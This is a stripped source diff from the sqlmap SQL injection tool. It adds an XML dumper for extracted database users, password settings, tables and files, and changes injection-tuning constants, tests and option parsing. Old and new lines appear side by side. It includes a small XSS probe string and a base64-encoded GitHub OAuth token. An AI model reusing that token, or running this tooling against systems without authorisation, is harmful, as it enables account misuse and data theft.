CRAWL_EXCLUDE_EXTENSIONS = ('3ds', '3g2', '3gp', '7z', 'DS_Store', 'a', 'aac', 'adp', 'ai', 'aif', 'aiff', 'apk', 'ar', 'asf', 'au', 'avi', 'bak', 'bin', 'bk', 'bmp', 'btif', 'bz2', 'cab', 'caf', 'cgm', 'cmx', 'cpio', 'cr2', 'dat', 'deb', 'djvu', 'dll', 'dmg', 'dmp', 'dng', 'doc', 'docx', 'dot', 'dotx', 'dra', 'dsk', 'dts', 'dtshd', 'dvb', 'dwg', 'dxf', 'ear', 'ecelp4800', 'ecelp7470', 'ecelp9600', 'egg', 'eol', 'eot', 'epub', 'exe', 'f4v', 'fbs', 'fh', 'fla', 'flac', 'fli', 'flv', 'fpx', 'fst', 'fvt', 'g3', 'gif', 'gz', 'h261', 'h263', 'h264', 'ico', 'ief', 'image', 'img', 'ipa', 'iso', 'jar', 'jpeg', 'jpg', 'jpgv', 'jpm', 'jxr', 'ktx', 'lvp', 'lz', 'lzma', 'lzo', 'm3u', 'm4a', 'm4v', 'mar', 'mdi', 'mid', 'mj2', 'mka', 'mkv', 'mmr', 'mng', 'mov', 'movie', 'mp3', 'mp4', 'mp4a', 'mpeg', 'mpg', 'mpga', 'mxu', 'nef', 'npx', 'o', 'oga', 'ogg', 'ogv', 'otf', 'pbm', 'pcx', 'pdf', 'pea', 'pgm', 'pic', 'png', 'pnm', 'ppm', 'pps', 'ppt', 'pptx', 'ps', 'psd', 'pya', 'pyc', 'pyo', 'pyv', 'qt', 'rar', 'ras', 'raw', 'rgb', 'rip', 'rlc', 'rz', 's3m', 's7z', 'scm', 'scpt', 'sgi', 'shar', 'sil', 'smv', 'so', 'sub', 'swf', 'tar', 'tbz2', 'tga', 'tgz', 'tif', 'tiff', 'tlz', 'ts', 'ttf', 'uvh', 'uvi', 'uvm', 'uvp', 'uvs', 'uvu', 'viv', 'vob', 'war', 'wav', 'wax', 'wbmp', 'wdp', 'weba', 'webm', 'webp', 'whl', 'wm', 'wma', 'wmv', 'wmx', 'woff', 'woff2', 'wvx', 'xbm', 'xif', 'xls', 'xlsx', 'xlt', 'xm', 'xpi', 'xpm', 'xwd', 'xz', 'z', 'zip', 'zipx')
# Patterns often seen in HTTP headers containing custom injection marking character
PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)"
@@ -517,20 +506,20 @@ PARSE_HEADERS_LIMIT = 3
# Step used in ORDER BY technique used for finding the right number of columns in UNION query injections
ORDER_BY_STEP = 10
# Maximum number of times for revalidation of a character in inference (as required)
MAX_REVALIDATION_STEPS = 5
# Maximum number of times for revalidation of a character in time-based injections
MAX_TIME_REVALIDATION_STEPS = 5
# Characters that can be used to split parameter values in provided command line (e.g. in --tamper)
PARAMETER_SPLITTING_REGEX = r"[,|;]"
PARAMETER_SPLITTING_REGEX = r'[,|;]'
# Regular expression describing possible union char value (e.g. used in --union-char)
UNION_CHAR_REGEX = r"\A\w+\Z"
UNION_CHAR_REGEX = r'\A\w+\Z'
# Attribute used for storing original parameter value in special cases (e.g. POST)
UNENCODED_ORIGINAL_VALUE = "original"
UNENCODED_ORIGINAL_VALUE = 'original'
# Common column names containing usernames (used for hash cracking in some cases)
COMMON_USER_COLUMNS = ("user", "username", "user_name", "benutzername", "benutzer", "utilisateur", "usager", "consommateur", "utente", "utilizzatore", "usufrutuario", "korisnik", "usuario", "consumidor")
COMMON_USER_COLUMNS = ('user', 'username', 'user_name', 'benutzername', 'benutzer', 'utilisateur', 'usager', 'consommateur', 'utente', 'utilizzatore', 'usufrutuario', 'korisnik', 'usuario', 'consumidor')
# Default delimiter in GET/POST values
DEFAULT_GET_POST_DELIMITER = '&'
@@ -542,7 +531,7 @@ DEFAULT_COOKIE_DELIMITER = ';'
FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
# Github OAuth token used for creating an automatic Issue for unhandled exceptions
GITHUB_REPORT_OAUTH_TOKEN = "NTMyNWNkMmZkMzRlMDZmY2JkMmY0MGI4NWI0MzVlM2Q5YmFjYWNhYQ=="
GITHUB_REPORT_OAUTH_TOKEN = "YzNkYTgyMTdjYzdjNjZjMjFjMWE5ODI5OGQyNzk2ODM1M2M0MzUyOA=="
# Skip unforced HashDB flush requests below the threshold number of cached items
HASHDB_FLUSH_THRESHOLD = 32
@@ -554,7 +543,7 @@ HASHDB_FLUSH_RETRIES = 3
HASHDB_END_TRANSACTION_RETRIES = 3
# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
HASHDB_MILESTONE_VALUE = "BkfRWrtCYK" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))'
HASHDB_MILESTONE_VALUE = "baFJusZrel" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))'
# Warn user of possible delay due to large page dump in full UNION query injections
LARGE_OUTPUT_THRESHOLD = 1024 ** 2
@@ -580,9 +569,6 @@ DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters)
# Alphabet used for heuristic checks
HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.')
# Minor artistic touch
BANNER = re.sub(r"\[.\]", lambda _: "[\033[01;41m%s\033[01;49m]" % random.sample(HEURISTIC_CHECK_ALPHABET, 1)[0], BANNER)
# String used for dummy non-SQLi (e.g. XSS) heuristic checks of a tested parameter value
DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">"
@@ -596,7 +582,7 @@ NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6
MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
# Maximum response total page size (trimmed if larger)
MAX_CONNECTION_TOTAL_SIZE = 50 * 1024 * 1024
MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024
# For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher)
MAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024
@@ -617,7 +603,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
CHECK_ZERO_COLUMNS_THRESHOLD = 10
# Boldify all logger messages containing these "patterns"
BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA")
BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA")
# Generic www root directory names
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")

View File

@@ -68,6 +68,7 @@ from lib.core.settings import URI_INJECTABLE_REGEX
from lib.core.settings import USER_AGENT_ALIASES
from lib.core.settings import XML_RECOGNITION_REGEX
from lib.utils.hashdb import HashDB
from lib.core.xmldump import dumper as xmldumper
from thirdparty.odict.odict import OrderedDict
def _setRequestParams():
@@ -592,7 +593,11 @@ def _createDumpDir():
conf.dumpPath = tempDir
def _configureDumper():
conf.dumper = dumper
if hasattr(conf, 'xmlFile') and conf.xmlFile:
conf.dumper = xmldumper
else:
conf.dumper = dumper
conf.dumper.setOutputFile()
def _createTargetDirs():

View File

@@ -41,8 +41,6 @@ class Failures(object):
failedParseOn = None
failedTraceBack = None
_failures = Failures()
def smokeTest():
"""
Runs the basic smoke testing of a program
@@ -55,17 +53,16 @@ def smokeTest():
if any(_ in root for _ in ("thirdparty", "extra")):
continue
for filename in files:
if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py":
length += 1
for ifile in files:
length += 1
for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH):
if any(_ in root for _ in ("thirdparty", "extra")):
continue
for filename in files:
if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py":
path = os.path.join(root, os.path.splitext(filename)[0])
for ifile in files:
if os.path.splitext(ifile)[1].lower() == ".py" and ifile != "__init__.py":
path = os.path.join(root, os.path.splitext(ifile)[0])
path = path.replace(paths.SQLMAP_ROOT_PATH, '.')
path = path.replace(os.sep, '.').lstrip('.')
try:
@@ -74,7 +71,7 @@ def smokeTest():
except Exception, msg:
retVal = False
dataToStdout("\r")
errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), msg)
errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, ifile), msg)
logger.error(errMsg)
else:
# Run doc tests
@@ -83,9 +80,9 @@ def smokeTest():
if failure_count > 0:
retVal = False
count += 1
status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length))
dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status))
count += 1
status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length))
dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status))
clearConsoleLine()
if retVal:
@@ -195,11 +192,11 @@ def liveTest():
else:
errMsg = "test failed"
if _failures.failedItems:
errMsg += " at parsing items: %s" % ", ".join(i for i in _failures.failedItems)
if Failures.failedItems:
errMsg += " at parsing items: %s" % ", ".join(i for i in Failures.failedItems)
errMsg += " - scan folder: %s" % paths.SQLMAP_OUTPUT_PATH
errMsg += " - traceback: %s" % bool(_failures.failedTraceBack)
errMsg += " - traceback: %s" % bool(Failures.failedTraceBack)
if not vulnerable:
errMsg += " - SQL injection not detected"
@@ -207,14 +204,14 @@ def liveTest():
logger.error(errMsg)
test_case_fd.write("%s\n" % errMsg)
if _failures.failedParseOn:
if Failures.failedParseOn:
console_output_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "console_output"), "wb", UNICODE_ENCODING)
console_output_fd.write(_failures.failedParseOn)
console_output_fd.write(Failures.failedParseOn)
console_output_fd.close()
if _failures.failedTraceBack:
if Failures.failedTraceBack:
traceback_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "traceback"), "wb", UNICODE_ENCODING)
traceback_fd.write(_failures.failedTraceBack)
traceback_fd.write(Failures.failedTraceBack)
traceback_fd.close()
beep()
@@ -235,9 +232,9 @@ def liveTest():
return retVal
def initCase(switches, count):
_failures.failedItems = []
_failures.failedParseOn = None
_failures.failedTraceBack = None
Failures.failedItems = []
Failures.failedParseOn = None
Failures.failedTraceBack = None
paths.SQLMAP_OUTPUT_PATH = tempfile.mkdtemp(prefix="%s%d-" % (MKSTEMP_PREFIX.TESTING, count))
paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
@@ -281,10 +278,10 @@ def runCase(parse):
LOGGER_HANDLER.stream = sys.stdout = sys.__stdout__
if unhandled_exception:
_failures.failedTraceBack = "unhandled exception: %s" % str(traceback.format_exc())
Failures.failedTraceBack = "unhandled exception: %s" % str(traceback.format_exc())
retVal = None
elif handled_exception:
_failures.failedTraceBack = "handled exception: %s" % str(traceback.format_exc())
Failures.failedTraceBack = "handled exception: %s" % str(traceback.format_exc())
retVal = None
elif result is False: # this means no SQL injection has been detected - if None, ignore
retVal = False
@@ -301,17 +298,17 @@ def runCase(parse):
if item.startswith("r'") and item.endswith("'"):
if not re.search(item[2:-1], parse_on, re.DOTALL):
retVal = None
_failures.failedItems.append(item)
Failures.failedItems.append(item)
elif item not in parse_on:
retVal = None
_failures.failedItems.append(item)
Failures.failedItems.append(item)
if _failures.failedItems:
_failures.failedParseOn = console
if Failures.failedItems:
Failures.failedParseOn = console
elif retVal is False:
_failures.failedParseOn = console
Failures.failedParseOn = console
return retVal

View File

@@ -42,7 +42,6 @@ class _ThreadData(threading.local):
self.disableStdOut = False
self.hashDBCursor = None
self.inTransaction = False
self.lastCode = None
self.lastComparisonPage = None
self.lastComparisonHeaders = None
self.lastComparisonCode = None
@@ -59,7 +58,6 @@ class _ThreadData(threading.local):
self.retriesCount = 0
self.seqMatcher = difflib.SequenceMatcher(None)
self.shared = shared
self.validationRun = 0
self.valueStack = []
ThreadData = _ThreadData()

536
lib/core/xmldump.py Normal file
View File

@@ -0,0 +1,536 @@
#!/usr/bin/env python
import codecs
import os
import re
import xml
import xml.sax.saxutils as saxutils
from lib.core.common import getUnicode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import SqlmapFilePathException
from lib.core.settings import UNICODE_ENCODING
from thirdparty.prettyprint import prettyprint
from xml.dom.minidom import Document
from xml.parsers.expat import ExpatError
TECHNIC_ELEM_NAME = "Technic"
TECHNICS_ELEM_NAME = "Technics"
BANNER_ELEM_NAME = "Banner"
COLUMNS_ELEM_NAME = "DatabaseColumns"
COLUMN_ELEM_NAME = "Column"
CELL_ELEM_NAME = "Cell"
COLUMN_ATTR = "column"
ROW_ELEM_NAME = "Row"
TABLES_ELEM_NAME = "tables"
DATABASE_COLUMNS_ELEM = "DB"
DB_TABLES_ELEM_NAME = "DBTables"
DB_TABLE_ELEM_NAME = "DBTable"
IS_DBA_ELEM_NAME = "isDBA"
FILE_CONTENT_ELEM_NAME = "FileContent"
DB_ATTR = "db"
UNKNOWN_COLUMN_TYPE = "unknown"
USER_SETTINGS_ELEM_NAME = "UserSettings"
USER_SETTING_ELEM_NAME = "UserSetting"
USERS_ELEM_NAME = "Users"
USER_ELEM_NAME = "User"
DB_USER_ELEM_NAME = "DBUser"
SETTINGS_ELEM_NAME = "Settings"
DBS_ELEM_NAME = "DBs"
DB_NAME_ELEM_NAME = "DBName"
DATABASE_ELEM_NAME = "Database"
TABLE_ELEM_NAME = "Table"
DB_TABLE_VALUES_ELEM_NAME = "DBTableValues"
DB_VALUES_ELEM = "DBValues"
QUERIES_ELEM_NAME = "Queries"
QUERY_ELEM_NAME = "Query"
REGISTERY_ENTRIES_ELEM_NAME = "RegistryEntries"
REGISTER_DATA_ELEM_NAME = "RegisterData"
DEFAULT_DB = "All"
MESSAGE_ELEM = "Message"
MESSAGES_ELEM_NAME = "Messages"
ERROR_ELEM_NAME = "Error"
LST_ELEM_NAME = "List"
LSTS_ELEM_NAME = "Lists"
CURRENT_USER_ELEM_NAME = "CurrentUser"
CURRENT_DB_ELEM_NAME = "CurrentDB"
MEMBER_ELEM = "Member"
ADMIN_USER = "Admin"
REGULAR_USER = "User"
STATUS_ELEM_NAME = "Status"
RESULTS_ELEM_NAME = "Results"
UNHANDLED_PROBLEM_TYPE = "Unhandled"
NAME_ATTR = "name"
TYPE_ATTR = "type"
VALUE_ATTR = "value"
SUCESS_ATTR = "success"
NAME_SPACE_ATTR = 'http://www.w3.org/2001/XMLSchema-instance'
XMLNS_ATTR = "xmlns:xsi"
SCHEME_NAME = "sqlmap.xsd"
SCHEME_NAME_ATTR = "xsi:noNamespaceSchemaLocation"
CHARACTERS_TO_ENCODE = range(32) + range(127, 256)
ENTITIES = {'"': '&quot;', "'": "&apos;"}
class XMLDump(object):
'''
This class purpose is to dump the data into an xml Format.
The format of the xml file is described in the scheme file xml/sqlmap.xsd
'''
def __init__(self):
self._outputFile = None
self._outputFP = None
self.__root = None
self.__doc = Document()
def _addToRoot(self, element):
'''
Adds element to the root element
'''
self.__root.appendChild(element)
def __write(self, data, n=True):
'''
Writes the data into the file
'''
if n:
self._outputFP.write("%s\n" % data)
else:
self._outputFP.write("%s " % data)
self._outputFP.flush()
kb.dataOutputFlag = True
def _getRootChild(self, elemName):
'''
Returns the child of the root with the described name
'''
elements = self.__root.getElementsByTagName(elemName)
if elements:
return elements[0]
return elements
def _createTextNode(self, data):
'''
Creates a text node with utf8 data inside.
The text is escaped to an fit the xml text Format.
'''
if data is None:
return self.__doc.createTextNode(u'')
else:
escaped_data = saxutils.escape(data, ENTITIES)
return self.__doc.createTextNode(escaped_data)
def _createAttribute(self, attrName, attrValue):
'''
Creates an attribute node with utf8 data inside.
The text is escaped to an fit the xml text Format.
'''
attr = self.__doc.createAttribute(attrName)
if attrValue is None:
attr.nodeValue = u''
else:
attr.nodeValue = getUnicode(attrValue)
return attr
def string(self, header, data, sort=True):
'''
Adds string element to the xml.
'''
if isinstance(data, (list, tuple, set)):
self.lister(header, data, sort)
return
messagesElem = self._getRootChild(MESSAGES_ELEM_NAME)
if (not(messagesElem)):
messagesElem = self.__doc.createElement(MESSAGES_ELEM_NAME)
self._addToRoot(messagesElem)
if data:
data = self._formatString(data)
else:
data = ""
elem = self.__doc.createElement(MESSAGE_ELEM)
elem.setAttributeNode(self._createAttribute(TYPE_ATTR, header))
elem.appendChild(self._createTextNode(data))
messagesElem.appendChild(elem)
def lister(self, header, elements, sort=True):
'''
Adds information formatted as list element
'''
lstElem = self.__doc.createElement(LST_ELEM_NAME)
lstElem.setAttributeNode(self._createAttribute(TYPE_ATTR, header))
if elements:
if sort:
try:
elements = set(elements)
elements = list(elements)
elements.sort(key=lambda x: x.lower())
except:
pass
for element in elements:
memberElem = self.__doc.createElement(MEMBER_ELEM)
lstElem.appendChild(memberElem)
if isinstance(element, basestring):
memberElem.setAttributeNode(self._createAttribute(TYPE_ATTR, "string"))
memberElem.appendChild(self._createTextNode(element))
elif isinstance(element, (list, tuple, set)):
memberElem.setAttributeNode(self._createAttribute(TYPE_ATTR, "list"))
for e in element:
memberElemStr = self.__doc.createElement(MEMBER_ELEM)
memberElemStr.setAttributeNode(self._createAttribute(TYPE_ATTR, "string"))
memberElemStr.appendChild(self._createTextNode(getUnicode(e)))
memberElem.appendChild(memberElemStr)
listsElem = self._getRootChild(LSTS_ELEM_NAME)
if not(listsElem):
listsElem = self.__doc.createElement(LSTS_ELEM_NAME)
self._addToRoot(listsElem)
listsElem.appendChild(lstElem)
def technic(self, technicType, data):
'''
Adds information about the technic used to extract data from the db
'''
technicElem = self.__doc.createElement(TECHNIC_ELEM_NAME)
technicElem.setAttributeNode(self._createAttribute(TYPE_ATTR, technicType))
textNode = self._createTextNode(data)
technicElem.appendChild(textNode)
technicsElem = self._getRootChild(TECHNICS_ELEM_NAME)
if not(technicsElem):
technicsElem = self.__doc.createElement(TECHNICS_ELEM_NAME)
self._addToRoot(technicsElem)
technicsElem.appendChild(technicElem)
def banner(self, data):
'''
Adds information about the database banner to the xml.
The banner contains information about the type and the version of the database.
'''
bannerElem = self.__doc.createElement(BANNER_ELEM_NAME)
bannerElem.appendChild(self._createTextNode(data))
self._addToRoot(bannerElem)
def currentUser(self, data):
'''
Adds information about the current database user to the xml
'''
currentUserElem = self.__doc.createElement(CURRENT_USER_ELEM_NAME)
textNode = self._createTextNode(data)
currentUserElem.appendChild(textNode)
self._addToRoot(currentUserElem)
def currentDb(self, data):
'''
Adds information about the current database is use to the xml
'''
currentDBElem = self.__doc.createElement(CURRENT_DB_ELEM_NAME)
textNode = self._createTextNode(data)
currentDBElem.appendChild(textNode)
self._addToRoot(currentDBElem)
def dba(self, isDBA):
'''
Adds information to the xml that indicates whether the user has DBA privileges
'''
isDBAElem = self.__doc.createElement(IS_DBA_ELEM_NAME)
isDBAElem.setAttributeNode(self._createAttribute(VALUE_ATTR, getUnicode(isDBA)))
self._addToRoot(isDBAElem)
def users(self, users):
'''
Adds a list of the existing users to the xml
'''
usersElem = self.__doc.createElement(USERS_ELEM_NAME)
if isinstance(users, basestring):
users = [users]
if users:
for user in users:
userElem = self.__doc.createElement(DB_USER_ELEM_NAME)
usersElem.appendChild(userElem)
userElem.appendChild(self._createTextNode(user))
self._addToRoot(usersElem)
def dbs(self, dbs):
'''
Adds a list of the existing databases to the xml
'''
dbsElem = self.__doc.createElement(DBS_ELEM_NAME)
if dbs:
for db in dbs:
dbElem = self.__doc.createElement(DB_NAME_ELEM_NAME)
dbsElem.appendChild(dbElem)
dbElem.appendChild(self._createTextNode(db))
self._addToRoot(dbsElem)
def userSettings(self, header, userSettings, subHeader):
'''
Adds information about the user's settings to the xml.
The information can be user's passwords, privileges and etc..
'''
self._areAdmins = set()
userSettingsElem = self._getRootChild(USER_SETTINGS_ELEM_NAME)
if (not(userSettingsElem)):
userSettingsElem = self.__doc.createElement(USER_SETTINGS_ELEM_NAME)
self._addToRoot(userSettingsElem)
userSettingElem = self.__doc.createElement(USER_SETTING_ELEM_NAME)
userSettingElem.setAttributeNode(self._createAttribute(TYPE_ATTR, header))
if isinstance(userSettings, (tuple, list, set)):
self._areAdmins = userSettings[1]
userSettings = userSettings[0]
users = userSettings.keys()
users.sort(key=lambda x: x.lower())
for user in users:
userElem = self.__doc.createElement(USER_ELEM_NAME)
userSettingElem.appendChild(userElem)
if user in self._areAdmins:
userElem.setAttributeNode(self._createAttribute(TYPE_ATTR, ADMIN_USER))
else:
userElem.setAttributeNode(self._createAttribute(TYPE_ATTR, REGULAR_USER))
settings = userSettings[user]
settings.sort()
for setting in settings:
settingsElem = self.__doc.createElement(SETTINGS_ELEM_NAME)
settingsElem.setAttributeNode(self._createAttribute(TYPE_ATTR, subHeader))
settingTextNode = self._createTextNode(setting)
settingsElem.appendChild(settingTextNode)
userElem.appendChild(settingsElem)
userSettingsElem.appendChild(userSettingElem)
def dbTables(self, dbTables):
'''
Adds information of the existing db tables to the xml
'''
if not isinstance(dbTables, dict):
self.string(TABLES_ELEM_NAME, dbTables)
return
dbTablesElem = self.__doc.createElement(DB_TABLES_ELEM_NAME)
for db, tables in dbTables.items():
tables.sort(key=lambda x: x.lower())
dbElem = self.__doc.createElement(DATABASE_ELEM_NAME)
dbElem.setAttributeNode(self._createAttribute(NAME_ATTR, db))
dbTablesElem.appendChild(dbElem)
for table in tables:
tableElem = self.__doc.createElement(DB_TABLE_ELEM_NAME)
tableElem.appendChild(self._createTextNode(table))
dbElem.appendChild(tableElem)
self._addToRoot(dbTablesElem)
def dbTableColumns(self, tableColumns):
'''
Adds information about the columns of the existing tables to the xml
'''
columnsElem = self._getRootChild(COLUMNS_ELEM_NAME)
if not(columnsElem):
columnsElem = self.__doc.createElement(COLUMNS_ELEM_NAME)
for db, tables in tableColumns.items():
if not db:
db = DEFAULT_DB
dbElem = self.__doc.createElement(DATABASE_COLUMNS_ELEM)
dbElem.setAttributeNode(self._createAttribute(NAME_ATTR, db))
columnsElem.appendChild(dbElem)
for table, columns in tables.items():
tableElem = self.__doc.createElement(TABLE_ELEM_NAME)
tableElem.setAttributeNode(self._createAttribute(NAME_ATTR, table))
colList = columns.keys()
colList.sort(key=lambda x: x.lower())
for column in colList:
colType = columns[column]
colElem = self.__doc.createElement(COLUMN_ELEM_NAME)
if colType is not None:
colElem.setAttributeNode(self._createAttribute(TYPE_ATTR, colType))
else:
colElem.setAttributeNode(self._createAttribute(TYPE_ATTR, UNKNOWN_COLUMN_TYPE))
colElem.appendChild(self._createTextNode(column))
tableElem.appendChild(colElem)
self._addToRoot(columnsElem)
def dbTableValues(self, tableValues):
'''
Adds the values of specific table to the xml.
The values are organized according to the relevant row and column.
'''
tableElem = self.__doc.createElement(DB_TABLE_VALUES_ELEM_NAME)
if (tableValues is not None):
db = tableValues["__infos__"]["db"]
if not db:
db = "All"
table = tableValues["__infos__"]["table"]
count = int(tableValues["__infos__"]["count"])
columns = tableValues.keys()
columns.sort(key=lambda x: x.lower())
tableElem.setAttributeNode(self._createAttribute(DB_ATTR, db))
tableElem.setAttributeNode(self._createAttribute(NAME_ATTR, table))
for i in range(count):
rowElem = self.__doc.createElement(ROW_ELEM_NAME)
tableElem.appendChild(rowElem)
for column in columns:
if column != "__infos__":
info = tableValues[column]
value = info["values"][i]
if re.search("^[\ *]*$", value):
value = "NULL"
cellElem = self.__doc.createElement(CELL_ELEM_NAME)
cellElem.setAttributeNode(self._createAttribute(COLUMN_ATTR, column))
cellElem.appendChild(self._createTextNode(value))
rowElem.appendChild(cellElem)
dbValuesElem = self._getRootChild(DB_VALUES_ELEM)
if (not(dbValuesElem)):
dbValuesElem = self.__doc.createElement(DB_VALUES_ELEM)
self._addToRoot(dbValuesElem)
dbValuesElem.appendChild(tableElem)
logger.info("Table '%s.%s' dumped to XML file" % (db, table))
def dbColumns(self, dbColumns, colConsider, dbs):
'''
Adds information about the columns
'''
for column in dbColumns.keys():
printDbs = {}
for db, tblData in dbs.items():
for tbl, colData in tblData.items():
for col, dataType in colData.items():
if column in col:
if db in printDbs:
if tbl in printDbs[db]:
printDbs[db][tbl][col] = dataType
else:
printDbs[db][tbl] = {col: dataType}
else:
printDbs[db] = {}
printDbs[db][tbl] = {col: dataType}
continue
self.dbTableColumns(printDbs)
def query(self, query, queryRes):
'''
Adds details of an executed query to the xml.
The query details are the query itself and its results.
'''
queryElem = self.__doc.createElement(QUERY_ELEM_NAME)
queryElem.setAttributeNode(self._createAttribute(VALUE_ATTR, query))
queryElem.appendChild(self._createTextNode(queryRes))
queriesElem = self._getRootChild(QUERIES_ELEM_NAME)
if (not(queriesElem)):
queriesElem = self.__doc.createElement(QUERIES_ELEM_NAME)
self._addToRoot(queriesElem)
queriesElem.appendChild(queryElem)
def registerValue(self, registerData):
'''
Adds information about an extracted registry key to the xml
'''
registerElem = self.__doc.createElement(REGISTER_DATA_ELEM_NAME)
registerElem.appendChild(self._createTextNode(registerData))
registriesElem = self._getRootChild(REGISTERY_ENTRIES_ELEM_NAME)
if (not(registriesElem)):
registriesElem = self.__doc.createElement(REGISTERY_ENTRIES_ELEM_NAME)
self._addToRoot(registriesElem)
registriesElem.appendChild(registerElem)
def rFile(self, filePath, data):
'''
Adds an extracted file's content to the xml
'''
fileContentElem = self.__doc.createElement(FILE_CONTENT_ELEM_NAME)
fileContentElem.setAttributeNode(self._createAttribute(NAME_ATTR, filePath))
fileContentElem.appendChild(self._createTextNode(data))
self._addToRoot(fileContentElem)
def setOutputFile(self):
'''
Initiates the xml file from the configuration.
'''
if (conf.xmlFile):
try:
self._outputFile = conf.xmlFile
self.__root = None
if os.path.exists(self._outputFile):
try:
self.__doc = xml.dom.minidom.parse(self._outputFile)
self.__root = self.__doc.childNodes[0]
except ExpatError:
self.__doc = Document()
self._outputFP = codecs.open(self._outputFile, "w+", UNICODE_ENCODING)
if self.__root is None:
self.__root = self.__doc.createElementNS(NAME_SPACE_ATTR, RESULTS_ELEM_NAME)
self.__root.setAttributeNode(self._createAttribute(XMLNS_ATTR, NAME_SPACE_ATTR))
self.__root.setAttributeNode(self._createAttribute(SCHEME_NAME_ATTR, SCHEME_NAME))
self.__doc.appendChild(self.__root)
except IOError:
raise SqlmapFilePathException("Wrong filename provided for saving the xml file: %s" % conf.xmlFile)
def getOutputFile(self):
return self._outputFile
def finish(self, resultStatus, resultMsg=""):
'''
Finishes the dumper operation:
1. Adds the session status to the xml
2. Writes the xml to the file
3. Closes the xml file
'''
if ((self._outputFP is not None) and not(self._outputFP.closed)):
statusElem = self.__doc.createElement(STATUS_ELEM_NAME)
statusElem.setAttributeNode(self._createAttribute(SUCESS_ATTR, getUnicode(resultStatus)))
if not resultStatus:
errorElem = self.__doc.createElement(ERROR_ELEM_NAME)
if isinstance(resultMsg, Exception):
errorElem.setAttributeNode(self._createAttribute(TYPE_ATTR, type(resultMsg).__name__))
else:
errorElem.setAttributeNode(self._createAttribute(TYPE_ATTR, UNHANDLED_PROBLEM_TYPE))
errorElem.appendChild(self._createTextNode(getUnicode(resultMsg)))
statusElem.appendChild(errorElem)
self._addToRoot(statusElem)
self.__write(prettyprint.formatXML(self.__doc, encoding=UNICODE_ENCODING))
self._outputFP.close()
def closeDumper(status, msg=""):
"""
Closes the dumper of the session
"""
if hasattr(conf, "dumper") and hasattr(conf.dumper, "finish"):
conf.dumper.finish(status, msg)
dumper = XMLDump()

View File

@@ -759,9 +759,6 @@ def cmdLineParser(argv=None):
parser.add_option("--dummy", dest="dummy", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--murphy-rate", dest="murphyRate", type="int",
help=SUPPRESS_HELP)
parser.add_option("--pickled-options", dest="pickledOptions",
help=SUPPRESS_HELP)
@@ -885,6 +882,7 @@ def cmdLineParser(argv=None):
except ValueError, ex:
raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex.message
# Hide non-basic options in basic help case
for i in xrange(len(argv)):
if argv[i] == "-hh":
argv[i] = "-h"
@@ -912,14 +910,6 @@ def cmdLineParser(argv=None):
if not found:
parser.option_groups.remove(group)
for verbosity in (_ for _ in argv if re.search(r"\A\-v+\Z", _)):
try:
if argv.index(verbosity) == len(argv) - 1 or not argv[argv.index(verbosity) + 1].isdigit():
conf.verbose = verbosity.count('v') + 1
del argv[argv.index(verbosity)]
except (IndexError, ValueError):
pass
try:
(args, _) = parser.parse_args(argv)
except UnicodeEncodeError, ex:
@@ -948,7 +938,7 @@ def cmdLineParser(argv=None):
args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \
args.purgeOutput, args.pickledOptions, args.sitemapUrl)):
errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), "
errMsg += "use -h for basic or -hh for advanced help\n"
errMsg += "use -h for basic or -hh for advanced help"
parser.error(errMsg)
return args

View File

@@ -59,13 +59,6 @@ def htmlParser(page):
xmlfile = paths.ERRORS_XML
handler = HTMLHandler(page)
key = hash(page)
if key in kb.cache.parsedDbms:
retVal = kb.cache.parsedDbms[key]
if retVal:
handler._markAsErrorPage()
return retVal
parseXmlFile(xmlfile, handler)
@@ -75,8 +68,6 @@ def htmlParser(page):
else:
kb.lastParserStatus = None
kb.cache.parsedDbms[key] = handler.dbms
# generic SQL warning/error messages
if re.search(r"SQL (warning|error|syntax)", page, re.I):
handler._markAsErrorPage()

View File

@@ -26,7 +26,6 @@ from lib.core.common import singleTimeWarnMessage
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.decorators import cachedmethod
from lib.core.enums import DBMS
from lib.core.enums import HTTP_HEADER
